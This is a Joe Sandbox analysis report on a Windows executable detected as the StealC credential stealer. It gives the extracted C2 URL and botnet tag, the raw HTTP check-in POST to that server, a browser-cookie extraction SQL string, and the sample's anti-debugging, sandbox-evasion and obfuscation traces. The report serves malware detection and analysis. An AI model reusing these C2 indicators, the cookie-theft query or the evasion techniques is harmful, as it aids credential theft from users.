Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1530693
MD5:6a6d66291698792c3e6764ec5dd4e0ff
SHA1:dd9d3a54a2016c6b6e049f43fca9fcccedc89493
SHA256:0daf657523ba709f5c99af228de6b06699c6ddba2bfc4be766baae3027740602
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6552 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6A6D66291698792C3E6764EC5DD4E0FF)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6552JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6552JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.790000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-10T12:05:09.806519+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.790000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for submitted file
                Source: file.exeVirustotal: Detection: 54%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0079C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00797240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00797240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00799AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00799AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00799B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00799B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_007A8EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0079DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0079E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_007A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0079ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0079BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0079DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0079F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0079F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_007A3EA0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 33 45 38 30 35 35 32 44 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="hwid"443E80552D561166170430------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build"doma------AAFBAKECAEGCBFIEGDGI--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00794880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00794880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 34 33 45 38 30 35 35 32 44 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 49 2d 2d 0d 0a Data Ascii: ------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="hwid"443E80552D561166170430------AAFBAKECAEGCBFIEGDGIContent-Disposition: form-data; name="build"doma------AAFBAKECAEGCBFIEGDGI--
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/9
                Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(
                Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpT
                Source: file.exe, 00000000.00000002.1789228980.0000000001509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpl

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B58A980_2_00B58A98
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B53A800_2_00B53A80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B192550_2_00B19255
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5DC270_2_00B5DC27
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5A59C0_2_00B5A59C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C78D900_2_00C78D90
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADADCF0_2_00ADADCF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B555150_2_00B55515
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4BD010_2_00A4BD01
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A6DEA50_2_00A6DEA5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A77E8A0_2_00A77E8A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B506050_2_00B50605
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 007945C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: vppxldjh ZLIB complexity 0.9950000704463481
                Source: file.exe, 00000000.00000002.1784022892.0000000000791000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1743679514.0000000005160000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_007A9600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_007A3720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SJREOFCX.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exe, 00000000.00000002.1789228980.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookiesS;
                Source: file.exeVirustotal: Detection: 54%
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1860096 > 1048576
                Source: file.exeStatic PE information: Raw size of vppxldjh is bigger than: 0x100000 < 0x19fe00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.790000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vppxldjh:EW;xcnejhbt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vppxldjh:EW;xcnejhbt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007A9860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cdf9b should be: 0x1ce021
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: vppxldjh
                Source: file.exeStatic PE information: section name: xcnejhbt
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B7F093 push edx; mov dword ptr [esp], eax0_2_00B7F0C1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E8 push eax; mov dword ptr [esp], ecx0_2_00C18129
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E8 push edx; mov dword ptr [esp], edi0_2_00C1812D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E8 push ebx; mov dword ptr [esp], 65BF9E3Fh0_2_00C18163
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E8 push 69FFA08Ah; mov dword ptr [esp], ecx0_2_00C1816F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E8 push 53B8B847h; mov dword ptr [esp], ecx0_2_00C18192
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C180E8 push 668C1000h; mov dword ptr [esp], eax0_2_00C181F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BFE890 push esi; mov dword ptr [esp], eax0_2_00BFE8A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007AB035 push ecx; ret 0_2_007AB048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB58CC push ecx; mov dword ptr [esp], 481B31B3h0_2_00AB58F4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0F8B0 push eax; mov dword ptr [esp], ebp0_2_00C0F8F5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7A8D8 push esi; mov dword ptr [esp], eax0_2_00A7A92E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7A8D8 push edx; mov dword ptr [esp], edi0_2_00A7A968
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7A8D8 push 65822EBEh; mov dword ptr [esp], ebx0_2_00A7A972
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A7A8D8 push esi; mov dword ptr [esp], edx0_2_00A7A97F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2300A push 6B1B397Fh; mov dword ptr [esp], edi0_2_00C2303F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C2300A push eax; mov dword ptr [esp], 42BBDBEAh0_2_00C23073
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3A00E push ebx; mov dword ptr [esp], eax0_2_00C3A5BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C089DF push 37AF756Fh; mov dword ptr [esp], edx0_2_00C08A28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C101E4 push esi; mov dword ptr [esp], ebx0_2_00C10244
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8A193 push 1D8B1A4Ch; mov dword ptr [esp], edi0_2_00B8A19B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAD1EB push ecx; mov dword ptr [esp], edi0_2_00BAD216
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAD1EB push esi; mov dword ptr [esp], 452172C5h0_2_00BAD304
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAD1EB push 018C3A8Ch; mov dword ptr [esp], ebx0_2_00BAD369
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C481A1 push 482089ADh; mov dword ptr [esp], esi0_2_00C481C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C481A1 push edx; mov dword ptr [esp], ebp0_2_00C4820F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7D9B0 push edx; mov dword ptr [esp], ecx0_2_00C7D9D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C7D14F push edx; mov dword ptr [esp], eax0_2_00C7D1A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C11122 push edx; mov dword ptr [esp], edi0_2_00C111A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B94946 push esi; mov dword ptr [esp], edi0_2_00B94A55
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B94946 push edi; mov dword ptr [esp], ebp0_2_00B94A7C
                Source: file.exeStatic PE information: section name: vppxldjh entropy: 7.954340444718931

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_007A9860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13354
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B61DDA second address: B61DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62068 second address: B620C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9B11D9853h 0x00000009 jmp 00007FB9B11D984Eh 0x0000000e popad 0x0000000f jmp 00007FB9B11D984Fh 0x00000014 jmp 00007FB9B11D9850h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB9B11D9852h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B62243 second address: B6227F instructions: 0x00000000 rdtsc 0x00000002 je 00007FB9B1005716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FB9B1005734h 0x00000010 jc 00007FB9B1005722h 0x00000016 js 00007FB9B1005716h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6241A second address: B6241F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6241F second address: B62425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B625DC second address: B625E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64DD8 second address: B64DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64DDE second address: B64DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64EA7 second address: B64EF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB9B1005727h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jmp 00007FB9B100571Fh 0x00000018 pushad 0x00000019 jne 00007FB9B1005716h 0x0000001f je 00007FB9B1005716h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [eax] 0x00000029 pushad 0x0000002a push edi 0x0000002b jno 00007FB9B1005716h 0x00000031 pop edi 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64EF9 second address: B64EFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B64EFD second address: B64F1A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB9B100571Eh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
